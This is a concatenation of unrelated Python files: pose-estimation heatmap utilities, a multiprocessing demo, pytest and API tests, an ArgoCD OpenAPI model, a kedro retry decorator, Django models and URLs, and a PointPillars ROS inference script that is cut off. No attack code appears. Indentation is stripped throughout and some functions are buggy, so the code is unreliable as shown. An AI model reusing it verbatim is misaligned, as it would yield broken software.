'''Draw a pose skeleton connecting joints (for visualisation purposes).
Left-hand-side joints are connected with blue lines. Right-hand-size joints
are connected with red lines. Center joints are connected with magenta
lines.
Args:
img (PIL.Image.Image): PIL image which the skeleton will be drawn over.
coords (Tensor): 16x2 tensor containing 0-based pixel coordinates
of joint locations. Joints indices are expected to match
http://human-pose.mpi-inf.mpg.de/#download
joint_mask (Tensor, optional): Mask of valid joints (invalid joints
will be drawn with grey lines).
'''
draw = Draw(img)
for bone_name, (j1, j2) in BONES.items():
if bone_name.startswith('center_'):
colour = (255, 0, 255) # Magenta
elif bone_name.startswith('left_'):
colour = (0, 0, 255) # Blue
elif bone_name.startswith('right_'):
colour = (255, 0, 0) # Red
else:
colour = (255, 255, 255)
if joint_mask is not None:
# Change colour to grey if either vertex is not masked in
if joint_mask[j1] == 0 or joint_mask[j2] == 0:
colour = (100, 100, 100)
draw.line([coords[j1, 0], coords[j1, 1], coords[j2, 0], coords[j2, 1]], fill=colour)
def draw_gaussian(img_tensor, x, y, sigma, normalize=False, clip_size=None):
'''Draw a Gaussian in a single-channel 2D image.
Args:
img_tensor: Image tensor to draw to.
x: x-coordinate of Gaussian centre (in pixels).
y: y-coordinate of Gaussian centre (in pixels).
sigma: Standard deviation of Gaussian (in pixels).
normalize: Ensures values sum to 1 when True.
clip_size: Restrict the size of the draw region.
'''
# To me it makes more sense to round() these, but hey - I'm just following the example
# of others.
x = int(x)
y = int(y)
if img_tensor.dim() == 2:
height, width = list(img_tensor.size())
elif img_tensor.dim() == 3:
n_chans, height, width = list(img_tensor.size())
assert n_chans == 1, 'expected img_tensor to have one channel'
img_tensor = img_tensor[0]
else:
raise Exception('expected img_tensor to have 2 or 3 dimensions')
radius = max(width, height)
if clip_size is not None:
radius = clip_size / 2
if radius < 0.5 or x <= -radius or y <= -radius or \
x >= (width - 1) + radius or y >= (height - 1) + radius:
return
start_x = max(0, math.ceil(x - radius))
end_x = min(width, int(x + radius + 1))
start_y = max(0, math.ceil(y - radius))
end_y = min(height, int(y + radius + 1))
w = end_x - start_x
h = end_y - start_y
subimg = img_tensor[start_y:end_y, start_x:end_x]
xs = torch.arange(start_x, end_x).type_as(img_tensor).view(1, w).expand_as(subimg)
ys = torch.arange(start_y, end_y).type_as(img_tensor).view(h, 1).expand_as(subimg)
k = -0.5 * (1 / sigma)**2
subimg.copy_((xs - x)**2)
subimg.add_((ys - y)**2)
subimg.mul_(k)
subimg.exp_()
if normalize:
val_sum = subimg.sum()
if val_sum > 0:
subimg.div_(val_sum)
def encode_heatmaps(coords, width, height, sigma=1):
'''Convert normalised coordinates into heatmaps.'''
# Normalised coordinates to pixel coordinates
coords.add_(1)
coords[:, :, 0].mul_(width / 2)
coords[:, :, 1].mul_(height / 2)
coords.add_(-0.5)
batch_size = coords.size(0)
n_chans = coords.size(1)
target = torch.FloatTensor(batch_size, n_chans, height, width).zero_()
for i in range(batch_size):
for j in range(n_chans):
x = round(coords[i, j, 0])
y = round(coords[i, j, 1])
draw_gaussian(target[i, j], x, y, sigma, normalize=False, clip_size=7)
return target
def get_preds(heatmaps):
batch_size, n_chans, height, width = list(heatmaps.size())
maxval, idx = torch.max(heatmaps.view(batch_size, n_chans, -1), 2)
maxval = maxval.view(batch_size, n_chans, 1)
idx = idx.view(batch_size, n_chans, 1)
coords = idx.repeat(1, 1, 2)
coords[:, :, 0] = coords[:, :, 0] % width
coords[:, :, 1] = coords[:, :, 1] / height
coords = coords.float()
# When maxval is zero, select coords (0, 0)
pred_mask = maxval.gt(0).repeat(1, 1, 2).float()
torch.mul(coords, pred_mask, out=coords)
return coords
def decode_heatmaps(heatmaps, use_neighbours=True):
'''Convert heatmaps into normalised coordinates.'''
coords = get_preds(heatmaps)
_, _, height, width = list(heatmaps.size())
if use_neighbours:
# "To improve performance at high precision thresholds the prediction
# is offset by a quarter of a pixel in the direction of its next highest
# neighbor before transforming back to the original coordinate space
# of the image"
# - Stacked Hourglass Networks for Human Pose Estimation
for i, joint_coords in enumerate(coords):
for j, (x, y) in enumerate(joint_coords):
x = int(x)
y = int(y)
if x > 0 and x < width - 1 and y > 0 and y < height - 1:
hm = heatmaps[i, j]
joint_coords[j, 0] += (0.25 * np.sign(hm[y, x + 1] - hm[y, x - 1]))
joint_coords[j, 1] += (0.25 * np.sign(hm[y + 1, x] - hm[y - 1, x]))
# Pixel coordinates to normalised coordinates
coords.add_(0.5)
coords[:, :, 0].mul_(2 / width)
coords[:, :, 1].mul_(2 / height)
coords.add_(-1)
return coords
def type_as_index(indices, tensor):
if tensor.is_cuda:
return indices.type(torch.cuda.LongTensor)
return indices.type(torch.LongTensor)
def reverse_tensor(tensor, dim):
indices = torch.arange(tensor.size(dim) - 1, -1, -1)
indices = type_as_index(indices, tensor)
return tensor.index_select(dim, indices)
@contextmanager
def timer(meter):
start_time = time.perf_counter()
yield
time_elapsed = time.perf_counter() - start_time
meter.add(time_elapsed)
def generator_timer(generator, meter):
while True:
with timer(meter):
vals = next(generator)
yield vals
def seed_random_number_generators(seed):
"""Seed all random number generators."""
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
| 7,295 | 2,664 |
import os
import time
from datetime import datetime
from multiprocessing import Process, Pool
def run_proc(n):
print('第{}次循环,子进程id:{},父进程id:{}'.format(n, os.getpid(), os.getppid()))
time.sleep(1)
if __name__ == '__main__':
print('父进程id', os.getpid())
# 1. 顺序执行任务
# start = datetime.now()
# for i in range(10):
# run_proc(i)
# print('耗时:', datetime.now() - start)
# 2. 多进程并行执行
# 2.1 多进程异步并行执行,进程间没有先后顺序
# start = datetime.now()
# for i in range(10):
# p = Process(target=run_proc, args=(i,))
# p.start()
# print('耗时:', datetime.now() - start)
# 2.2 多进程同步并行执行,进程间有先后顺序
# start = datetime.now()
# for i in range(10):
# p = Process(target=run_proc, args=(i,))
# p.start()
# p.join()
# print('耗时:', datetime.now() - start)
# 3. 进程池管理多进程
# 3.1 使用Pool管理多个进程,同步执行
# pool = Pool()
# start = datetime.now()
# for i in range(10):
# pool.apply(func=run_proc, args=(i,))
# pool.close()
# pool.join()
# print('耗时:', datetime.now() - start)
# 3.2 使用Pool管理多个进程,异步执行
# pool = Pool()
# start = datetime.now()
# for i in range(10):
# pool.apply_async(func=run_proc, args=(i,))
# pool.close()
# pool.join()
# print('耗时:', datetime.now() - start)
| 1,321 | 633 |
import pytest
from ..change_case import change_case
@pytest.mark.parametrize("x_str, expected", [
("BLACKstar", "blackSTAR"),
("jOhn", "JoHN")
])
def test_change_case(x_str, expected):
actual = change_case(x_str)
assert actual == expected
| 268 | 104 |
class Carro:
def __init__(self, velocidadeMaxima):
self.velocidadeMaxima = velocidadeMaxima
self.velocidade = 0
def acelerar(self, delta=5):
if self.velocidade < self.velocidadeMaxima:
self.velocidade += delta
else:
self.velocidade = 180
return self.velocidade if self.velocidade <= self.velocidadeMaxima else 180
def frear(self, delta=20):
if self.velocidade > 0:
self.velocidade -= delta
else:
self.velocidade = 0
return self.velocidade if self.velocidade >= 0 else 0
if __name__ == '__main__':
c1 = Carro(180)
for _ in range(25):
print(f'Acelerando {c1.acelerar(8)}')
for _ in range(10):
print(f' reduzindo a velocidade {c1.frear(delta=20)}') | 803 | 287 |
# coding: utf-8
"""
Consolidate Services
Description of all APIs # noqa: E501
The version of the OpenAPI document: version not set
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from argocd_client.configuration import Configuration
class ApplicationApplicationSyncRequest(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'dry_run': 'bool',
'infos': 'list[V1alpha1Info]',
'manifests': 'list[str]',
'name': 'str',
'prune': 'bool',
'resources': 'list[V1alpha1SyncOperationResource]',
'retry_strategy': 'V1alpha1RetryStrategy',
'revision': 'str',
'strategy': 'V1alpha1SyncStrategy'
}
attribute_map = {
'dry_run': 'dryRun',
'infos': 'infos',
'manifests': 'manifests',
'name': 'name',
'prune': 'prune',
'resources': 'resources',
'retry_strategy': 'retryStrategy',
'revision': 'revision',
'strategy': 'strategy'
}
def __init__(self, dry_run=None, infos=None, manifests=None, name=None, prune=None, resources=None, retry_strategy=None, revision=None, strategy=None, local_vars_configuration=None): # noqa: E501
"""ApplicationApplicationSyncRequest - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._dry_run = None
self._infos = None
self._manifests = None
self._name = None
self._prune = None
self._resources = None
self._retry_strategy = None
self._revision = None
self._strategy = None
self.discriminator = None
if dry_run is not None:
self.dry_run = dry_run
if infos is not None:
self.infos = infos
if manifests is not None:
self.manifests = manifests
if name is not None:
self.name = name
if prune is not None:
self.prune = prune
if resources is not None:
self.resources = resources
if retry_strategy is not None:
self.retry_strategy = retry_strategy
if revision is not None:
self.revision = revision
if strategy is not None:
self.strategy = strategy
@property
def dry_run(self):
"""Gets the dry_run of this ApplicationApplicationSyncRequest. # noqa: E501
:return: The dry_run of this ApplicationApplicationSyncRequest. # noqa: E501
:rtype: bool
"""
return self._dry_run
@dry_run.setter
def dry_run(self, dry_run):
"""Sets the dry_run of this ApplicationApplicationSyncRequest.
:param dry_run: The dry_run of this ApplicationApplicationSyncRequest. # noqa: E501
:type: bool
"""
self._dry_run = dry_run
@property
def infos(self):
"""Gets the infos of this ApplicationApplicationSyncRequest. # noqa: E501
:return: The infos of this ApplicationApplicationSyncRequest. # noqa: E501
:rtype: list[V1alpha1Info]
"""
return self._infos
@infos.setter
def infos(self, infos):
"""Sets the infos of this ApplicationApplicationSyncRequest.
:param infos: The infos of this ApplicationApplicationSyncRequest. # noqa: E501
:type: list[V1alpha1Info]
"""
self._infos = infos
@property
def manifests(self):
"""Gets the manifests of this ApplicationApplicationSyncRequest. # noqa: E501
:return: The manifests of this ApplicationApplicationSyncRequest. # noqa: E501
:rtype: list[str]
"""
return self._manifests
@manifests.setter
def manifests(self, manifests):
"""Sets the manifests of this ApplicationApplicationSyncRequest.
:param manifests: The manifests of this ApplicationApplicationSyncRequest. # noqa: E501
:type: list[str]
"""
self._manifests = manifests
@property
def name(self):
"""Gets the name of this ApplicationApplicationSyncRequest. # noqa: E501
:return: The name of this ApplicationApplicationSyncRequest. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this ApplicationApplicationSyncRequest.
:param name: The name of this ApplicationApplicationSyncRequest. # noqa: E501
:type: str
"""
self._name = name
@property
def prune(self):
"""Gets the prune of this ApplicationApplicationSyncRequest. # noqa: E501
:return: The prune of this ApplicationApplicationSyncRequest. # noqa: E501
:rtype: bool
"""
return self._prune
@prune.setter
def prune(self, prune):
"""Sets the prune of this ApplicationApplicationSyncRequest.
:param prune: The prune of this ApplicationApplicationSyncRequest. # noqa: E501
:type: bool
"""
self._prune = prune
@property
def resources(self):
"""Gets the resources of this ApplicationApplicationSyncRequest. # noqa: E501
:return: The resources of this ApplicationApplicationSyncRequest. # noqa: E501
:rtype: list[V1alpha1SyncOperationResource]
"""
return self._resources
@resources.setter
def resources(self, resources):
"""Sets the resources of this ApplicationApplicationSyncRequest.
:param resources: The resources of this ApplicationApplicationSyncRequest. # noqa: E501
:type: list[V1alpha1SyncOperationResource]
"""
self._resources = resources
@property
def retry_strategy(self):
"""Gets the retry_strategy of this ApplicationApplicationSyncRequest. # noqa: E501
:return: The retry_strategy of this ApplicationApplicationSyncRequest. # noqa: E501
:rtype: V1alpha1RetryStrategy
"""
return self._retry_strategy
@retry_strategy.setter
def retry_strategy(self, retry_strategy):
"""Sets the retry_strategy of this ApplicationApplicationSyncRequest.
:param retry_strategy: The retry_strategy of this ApplicationApplicationSyncRequest. # noqa: E501
:type: V1alpha1RetryStrategy
"""
self._retry_strategy = retry_strategy
@property
def revision(self):
"""Gets the revision of this ApplicationApplicationSyncRequest. # noqa: E501
:return: The revision of this ApplicationApplicationSyncRequest. # noqa: E501
:rtype: str
"""
return self._revision
@revision.setter
def revision(self, revision):
"""Sets the revision of this ApplicationApplicationSyncRequest.
:param revision: The revision of this ApplicationApplicationSyncRequest. # noqa: E501
:type: str
"""
self._revision = revision
@property
def strategy(self):
"""Gets the strategy of this ApplicationApplicationSyncRequest. # noqa: E501
:return: The strategy of this ApplicationApplicationSyncRequest. # noqa: E501
:rtype: V1alpha1SyncStrategy
"""
return self._strategy
@strategy.setter
def strategy(self, strategy):
"""Sets the strategy of this ApplicationApplicationSyncRequest.
:param strategy: The strategy of this ApplicationApplicationSyncRequest. # noqa: E501
:type: V1alpha1SyncStrategy
"""
self._strategy = strategy
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApplicationApplicationSyncRequest):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ApplicationApplicationSyncRequest):
return True
return self.to_dict() != other.to_dict()
| 9,578 | 2,770 |
"""
This module contains the retry decorator, which can be used as
``Node`` decorators to retry nodes. See ``kedro.pipeline.node.decorate``
"""
import logging
from functools import wraps
from time import sleep
from typing import Callable, Type
def retry(
exceptions: Type[Exception] = Exception, n_times: int = 1, delay_sec: float = 0
) -> Callable:
"""
Catches exceptions from the wrapped function at most n_times and then
bundles and propagates them.
**Make sure your function does not mutate the arguments**
Args:
exceptions: The superclass of exceptions to catch.
By default catch all exceptions.
n_times: At most let the function fail n_times. The bundle the
errors and propagate them. By default retry only once.
delay_sec: Delay between failure and next retry in seconds
Returns:
The original function with retry functionality.
"""
def _retry(func: Callable):
@wraps(func)
def _wrapper(*args, **kwargs):
counter = n_times
errors = []
while counter >= 0:
try:
return func(*args, **kwargs)
# pylint: disable=broad-except
except exceptions as exc:
errors.append(exc)
if counter != 0:
sleep(delay_sec)
counter -= 1
if errors:
log = logging.getLogger(__name__)
log.error(
"Function `%s` failed %i times. Errors:\n", func.__name__, n_times
)
log.error("\n".join(str(err) for err in errors))
log.error("Raising last exception")
raise errors[-1]
return _wrapper
return _retry
| 1,818 | 476 |
"""Test the ability to download files.
Test target:
- :py:meth:`lmp.dset._base.BaseDset.download`.
"""
import os
from typing import Callable
import pytest
import lmp.dset._base
import lmp.util.path
@pytest.fixture
def file_url() -> str:
"""Download target file URL."""
return 'https://raw.githubusercontent.com/ProFatXuanAll/language-model-playground/main/README.rst'
@pytest.fixture
def file_path(clean_dir_finalizer_factory: Callable[[str], None], exp_name: str, file_url: str, request) -> str:
"""Download file path.
After testing, clean up files and directories created during test.
"""
# Create temporary directory.
abs_dir_path = os.path.join(lmp.util.path.DATA_PATH, exp_name)
if not os.path.exists(abs_dir_path):
os.makedirs(abs_dir_path)
abs_file_path = os.path.join(abs_dir_path, file_url.split(r'/')[-1])
request.addfinalizer(clean_dir_finalizer_factory(abs_dir_path))
return abs_file_path
def test_download_as_text_file(file_path: str, file_url: str) -> None:
"""Must be able to download file and output as text file."""
lmp.dset._base.BaseDset.download_file(mode='text', download_path=file_path, url=file_url)
assert os.path.exists(file_path)
def test_download_as_binary_file(file_path: str, file_url: str) -> None:
"""Must be able to download file and output as binary file."""
lmp.dset._base.BaseDset.download_file(mode='binary', download_path=file_path, url=file_url)
assert os.path.exists(file_path)
| 1,470 | 531 |
"""account models."""
from django.contrib.auth.hashers import (
check_password, make_password
)
from django.db import models
from extension.modelutils import RandomFixedCharField
class Account(models.Model):
uid = RandomFixedCharField('编号', max_length=32, unique=True)
username = models.CharField('用户名', max_length=32, unique=True)
password = models.CharField('密码', max_length=80)
create_time = models.DateTimeField('创建时间', auto_now_add=True)
update_time = models.DateTimeField('修改时间', auto_now=True)
def __str__(self):
return self.username
class Meta:
"""Meta."""
verbose_name = '用户'
verbose_name_plural = '用户'
def set_password(self, raw_password):
self.password = make_password(raw_password)
def check_password(self, raw_password):
def setter(raw_password):
self.set_password(raw_password)
self.save(update_fields=['password'])
return check_password(raw_password, self.password, setter)
| 1,019 | 316 |
# -*- coding: utf-8 -*-
import json
import unittest
from .. import MoviesTest
class TestDeleteResource(MoviesTest):
def setUp(self):
self.setUpClass()
super(TestDeleteResource, self).setUp()
def test_delete_invalid_id(self):
response = self.app.delete('/%s/movies/a1' % self.api, headers=self.headers)
self.assertEqual(response.status_code, 409)
self.assertDictContainsSubset({'message': u'Resource "a1" is invalid'}, json.loads(response.data))
def test_delete_not_found_id(self):
response = self.app.delete('/%s/actors/%s' % (self.api, self.movies[0]['id']), headers=self.headers)
self.assertEqual(response.status_code, 404)
response_json = json.loads(response.data)
self.assertDictContainsSubset(
{'message': u'Resource "%s" not found' % self.movies[0]['id']},
response_json
)
def test_delete(self):
response = self.app.delete('/%s/movies/%s' % (self.api, self.movies[0]['id']), headers=self.headers)
self.assertEqual(response.status_code, 204)
response_json = self._count_test('movies', 2)
self.assertNotIn(self.movies[0], response_json.get('items'))
def test_delete_nested(self):
response = self.app.delete(
'/%s/actors/%s/movies/%s' % (self.api, self.actors[0]['id'], self.movies[0]['id']),
headers=self.headers
)
self.assertEqual(response.status_code, 204)
response_json = self._count_test('movies', 2)
self.assertNotIn(self.movies[0], response_json.get('items'))
class TestDeleteCollection(MoviesTest):
def setUp(self):
self.setUpClass()
super(TestDeleteCollection, self).setUp()
def test_delete(self):
response = self.app.delete('/%s/movies' % self.api, headers=self.headers)
self.assertEqual(response.status_code, 204)
response_json = self._count_test('movies', 0)
self.assertEqual([], response_json.get('items'))
def test_delete_nested(self):
response = self.app.delete(
'/%s/actors/%s/movies' % (self.api, self.actors[0]['id']),
headers=self.headers
)
self.assertEqual(response.status_code, 204)
response_json = self._count_test('movies', 2)
self.assertNotIn(self.movies[0], response_json.get('items'))
if __name__ == '__main__':
unittest.main()
| 2,420 | 810 |
from django.urls import path, re_path
from drf_yasg import openapi
from drf_yasg.views import get_schema_view
from rest_framework.routers import SimpleRouter, DefaultRouter
from rest_framework_simplejwt import views as jwt_views
from api.views import *
# роутер нужен, чтобы сгенерить урлы под вью сет и самому их не прописывать соотвественно
router = SimpleRouter()
router.register("baskets", BasketViewSet, "baskets")
schema_view = get_schema_view(
openapi.Info(
title="Snippets API",
default_version="v1",
description="Test description",
terms_of_service="https://www.google.com/policies/terms/",
contact=openapi.Contact(email="contact@snippets.local"),
license=openapi.License(name="BSD License"),
),
public=True,
)
urlpatterns = [
path("check/", check_api_view, name="check-api"),
path("token/", jwt_views.TokenObtainPairView.as_view(), name="token-obtain-pair"),
path("token/refresh/", jwt_views.TokenRefreshView.as_view(), name="token-refresh"),
*router.urls,
re_path(r"swagger(?P<format>\.json|\.yaml)$", schema_view.without_ui(cache_timeout=0), name="schema-json"),
path("swagger/", schema_view.with_ui("swagger", cache_timeout=0), name="schema-swagger-ui"),
path("redoc/", schema_view.with_ui("redoc", cache_timeout=0), name="schema-redoc"),
]
| 1,347 | 456 |
# -*- coding: utf-8 -*-
import os
import argparse
import pathlib
import pickle
import shutil
import time
from functools import partial
import sys
sys.path.append('../')
from pathlib import Path
import fire
import numpy as np
import torch
import torch.nn as nn
import os
print(torch.__version__)
print(os.environ['PYTHONPATH'])
from google.protobuf import text_format
import rospy
from sensor_msgs.msg import PointCloud2
import sensor_msgs.point_cloud2 as pc2
from std_msgs.msg import Header
from jsk_recognition_msgs.msg import BoundingBox, BoundingBoxArray
import torchplus
import second.data.kitti_common as kitti
from second.builder import target_assigner_builder, voxel_builder
from second.data.preprocess import merge_second_batch
from second.protos import pipeline_pb2
from second.pytorch.builder import (box_coder_builder, input_reader_builder,
lr_scheduler_builder, optimizer_builder,
second_builder)
from second.utils.eval import get_coco_eval_result, get_official_eval_result
from second.utils.progress_bar import ProgressBar
def get_paddings_indicator(actual_num, max_num, axis=0):
"""
Create boolean mask by actually number of a padded tensor.
:param actual_num:
:param max_num:
:param axis:
:return: [type]: [description]
"""
actual_num = torch.unsqueeze(actual_num, axis+1)
max_num_shape = [1] * len(actual_num.shape)
max_num_shape[axis+1] = -1
max_num = torch.arange(max_num, dtype=torch.int, device=actual_num.device).view(max_num_shape)
# tiled_actual_num : [N, M, 1]
# tiled_actual_num : [[3,3,3,3,3], [4,4,4,4,4], [2,2,2,2,2]]
# title_max_num : [[0,1,2,3,4], [0,1,2,3,4], [0,1,2,3,4]]
paddings_indicator = actual_num.int() > max_num
# paddings_indicator shape : [batch_size, max_num]
return paddings_indicator
def _get_pos_neg_loss(cls_loss, labels):
# cls_loss: [N, num_anchors, num_class]
# labels: [N, num_anchors]
batch_size = cls_loss.shape[0]
if cls_loss.shape[-1] == 1 or len(cls_loss.shape) == 2:
cls_pos_loss = (labels > 0).type_as(cls_loss) * cls_loss.view(
batch_size, -1)
cls_neg_loss = (labels == 0).type_as(cls_loss) * cls_loss.view(
batch_size, -1)
cls_pos_loss = cls_pos_loss.sum() / batch_size
cls_neg_loss = cls_neg_loss.sum() / batch_size
else:
cls_pos_loss = cls_loss[..., 1:].sum() / batch_size
cls_neg_loss = cls_loss[..., 0].sum() / batch_size
return cls_pos_loss, cls_neg_loss
def _flat_nested_json_dict(json_dict, flatted, sep=".", start=""):
for k, v in json_dict.items():
if isinstance(v, dict):
_flat_nested_json_dict(v, flatted, sep, start + sep + k)
else:
flatted[start + sep + k] = v
def flat_nested_json_dict(json_dict, sep=".") -> dict:
"""flat a nested json-like dict. this function make shadow copy.
"""
flatted = {}
for k, v in json_dict.items():
if isinstance(v, dict):
_flat_nested_json_dict(v, flatted, sep, k)
else:
flatted[k] = v
return flatted
def example_convert_to_torch(example, dtype=torch.float32, device=None) -> dict:
# device = device or torch.device("cuda:0")
example_torch = {}
# float_names = ["voxels", "anchors", "reg_targets", "reg_weights", "bev_map", "rect", "Trv2c", "P2"]
float_names = ["voxels", "anchors", "reg_targets", "reg_weights", "bev_map"]
for k, v in example.items():
if k in float_names:
example_torch[k] = torch.as_tensor(v, dtype=dtype).cuda()
elif k in ["coordinates", "labels", "num_points"]:
example_torch[k] = torch.as_tensor(v, dtype=torch.int32).cuda()
elif k in ["anchors_mask"]:
example_torch[k] = torch.as_tensor(v, dtype=torch.uint8).cuda()
# torch.uint8 is now deprecated, please use a dtype torch.bool instead
else:
example_torch[k] = v
return example_torch
def _make_point_field(num_field):
msg_pf1 = pc2.PointField()
msg_pf1.name = np.str('x')
msg_pf1.offset = np.uint32(0)
msg_pf1.datatype = np.uint8(7)
msg_pf1.count = np.uint32(1)
msg_pf2 = pc2.PointField()
msg_pf2.name = np.str('y')
msg_pf2.offset = np.uint32(4)
msg_pf2.datatype = np.uint8(7)
msg_pf2.count = np.uint32(1)
msg_pf3 = pc2.PointField()
msg_pf3.name = np.str('z')
msg_pf3.offset = np.uint32(8)
msg_pf3.datatype = np.uint8(7)
msg_pf3.count = np.uint32(1)
msg_pf4 = pc2.PointField()
msg_pf4.name = np.str('intensity')
msg_pf4.offset = np.uint32(16)
msg_pf4.datatype = np.uint8(7)
msg_pf4.count = np.uint32(1)
if num_field == 4:
return [msg_pf1, msg_pf2, msg_pf3, msg_pf4]
msg_pf5 = pc2.PointField()
msg_pf5.name = np.str('label')
msg_pf5.offset = np.uint32(20)
msg_pf5.datatype = np.uint8(4)
msg_pf5.count = np.uint32(1)
return [msg_pf1, msg_pf2, msg_pf3, msg_pf4, msg_pf5]
def publish_test(np_p_ranged, frame_id):
header = Header()
header.stamp = rospy.Time()
header.frame_id = frame_id
x = np_p_ranged[:, 0].reshape(-1)
y = np_p_ranged[:, 1].reshape(-1)
z = np_p_ranged[:, 2].reshape(-1)
if np_p_ranged.shape[1] == 4:
i = np_p_ranged[:, 3].reshape(-1)
else:
i = np.zeros(np_p_ranged.shape[0], 1).reshape(-1)
cloud = np.stack((x, y, z, i))
msg_segment = pc2.create_cloud(header=header,
fields=_make_point_field(4),
points=cloud.T)
pub_points.publish(msg_segment)
def predict_kitti_to_anno(net,
example,
class_names,
center_limit_range=None,
lidar_input=False,
global_set=None):
# eval example : [0: 'voxels', 1: 'num_points', 2: 'coordinates', 3: 'rect'
# 4: 'Trv2c', 5: 'P2', 6: 'anchors', 7: 'anchors_mask'
# 8: 'image_idx', 9: 'image_shape']
# eval example [0: 'voxels', 1: 'num_points', 2: 'coordinate', 3: 'anchors',
# 4: 'anchor_mask', 5: 'pc_idx']
pillar_x = example[0][:, :, 0].unsqueeze(0).unsqueeze(0)
pillar_y = example[0][:, :, 1].unsqueeze(0).unsqueeze(0)
pillar_z = example[0][:, :, 2].unsqueeze(0).unsqueeze(0)
pillar_i = example[0][:, :, 3].unsqueeze(0).unsqueeze(0)
num_points_per_pillar = example[1].float().unsqueeze(0)
# Find distance of x, y, and z from pillar center
# assuming xyres_16.proto
coors_x = example[2][:, 3].float()
coors_y = example[2][:, 2].float()
x_sub = coors_x.unsqueeze(1) * 0.16 -22.96 #+ 0.08#-22.96#+ 0.08#-22.96#-19.76
y_sub = coors_y.unsqueeze(1) * 0.16 -22.96#- 19.76 #-22.96#-19.76#-22.96#-19.76
ones = torch.ones([1, 100], dtype=torch.float32, device=pillar_x.device)
x_sub_shaped = torch.mm(x_sub, ones).unsqueeze(0).unsqueeze(0)
y_sub_shaped = torch.mm(y_sub, ones).unsqueeze(0).unsqueeze(0)
num_points_for_a_pillar = pillar_x.size()[3]
mask = get_paddings_indicator(num_points_per_pillar, num_points_for_a_pillar, axis=0)
mask = mask.permute(0, 2, 1)
mask = mask.unsqueeze(1)
mask = mask.type_as(pillar_x)
coors = example[2]
anchors = example[3]
anchors_mask = example[4]
anchors_mask = torch.as_tensor(anchors_mask, dtype=torch.uint8, device=pillar_x.device)
anchors_mask = anchors_mask.byte()
# rect = example[3]
# Trv2c = example[4]
# P2 = example[5]
pc_idx = example[5]
input = [pillar_x, pillar_y, pillar_z, pillar_i,
num_points_per_pillar, x_sub_shaped, y_sub_shaped,
mask, coors, anchors, anchors_mask, pc_idx]
predictions_dicts = net(input)
# lidar_box, final_score, label_preds, pc_idx
annos = []
for i, preds_dict in enumerate(predictions_dicts):
# image_shape = batch_image_shape[i]
pc_idx = preds_dict[3]
if preds_dict[0] is not None: # bbox list
# box_2d_preds = preds_dict[0].detach().cpu().numpy() # bbox
# box_preds = preds_dict[1].detach().cpu().numpy() # bbox3d_camera
scores = preds_dict[1].detach().cpu().numpy() # scores
box_preds_lidar = preds_dict[0].detach().cpu().numpy() # box3d_lidar
# write pred to file
label_preds = preds_dict[2].detach().cpu().numpy() # label_preds
anno = kitti.get_start_result_anno()
num_example = 0
content = ''
for box_lidar, score, label in zip(
box_preds_lidar, scores, label_preds):
if center_limit_range is not None:
limit_range = np.array(center_limit_range)
if (np.any(box_lidar[:3] < limit_range[:3])
or np.any(box_lidar[:3] > limit_range[3:])):
continue
content += str(label) + " 0.0 0 0.0 0.0 0.0 0.0 0.0 " + str(box_lidar[5]) + " " + str(box_lidar[3]) + " "\
+ str(box_lidar[4]) + " " + str(box_lidar[0]) + " " + str(box_lidar[1]) + " " + str(box_lidar[2]) + " " + str(box_lidar[6]) + " " + str(score) + "\n"
anno["name"].append(class_names[int(label)])
anno["truncated"].append(0.0)
anno["occluded"].append(0)
anno["alpha"].append(-np.arctan2(-box_lidar[1], box_lidar[0]) +
box_lidar[6])
anno["bbox"].append(np.array([0, 0, 0, 0]))
anno["dimensions"].append([box_lidar[4], box_lidar[5], box_lidar[3]]) # annotate by shl
# anno["dimensions"].append(box_lidar[3:6])
anno["location"].append(box_lidar[:3])
anno["rotation_y"].append(box_lidar[6])
if global_set is not None:
for i in range(100000):
if score in global_set:
score -= 1 / 100000
else:
global_set.add(score)
break
anno["score"].append(score)
num_example += 1
content = content.strip()
def delete_nan_points(points):
new_poins = np.array([])
print(points)
for i in range(points.shape[0]):
if (np.isnan(points[i][0])) | (np.isnan(points[i][1])) | (np.isnan(points[i][2])):
pass
else:
np.row_stack((new_poins, points[i]))
return new_poins
def callback(msg):
arr_bbox = BoundingBoxArray()
# pcl_msg = pc2.read_points(msg, skip_nans=False, field_names=("x", "y", "z", "intensity", "ring"))
pcl_msg = pc2.read_points(msg, skip_nans=False, field_names=("x", "y", "z"))
# pcl_msg = pc2.read_points(msg, skip_nans=True)
# print(pcl_msg)
np_p = np.array(list(pcl_msg), dtype=np.float32)
np_p = np.column_stack((np_p, np.zeros((np_p.shape[0], 1))))
print(np_p)
# np_p = np.delete(np_p, -1, 1) # delete "ring" field
# np_p = delete_nan_points(np_p)
eval_dataset = input_reader_builder.build(
input_cfg,
model_cfg,
training=False,
voxel_generator=voxel_generator,
target_assigner=target_assigner,
inference=True,
points=np_p)
eval_dataloader = torch.utils.data.DataLoader(
eval_dataset,
batch_size=input_cfg.batch_size,
shuffle=False,
num_workers=input_cfg.num_workers,
pin_memory=False,
collate_fn=merge_second_batch)
net.eval()
global_set = None
eval_data = iter(eval_dataloader)
example = next(eval_data)
example = example_convert_to_torch(example, torch.float32)
example_tuple = list(example.values())
example_tuple[5] = torch.from_numpy(example_tuple[5])
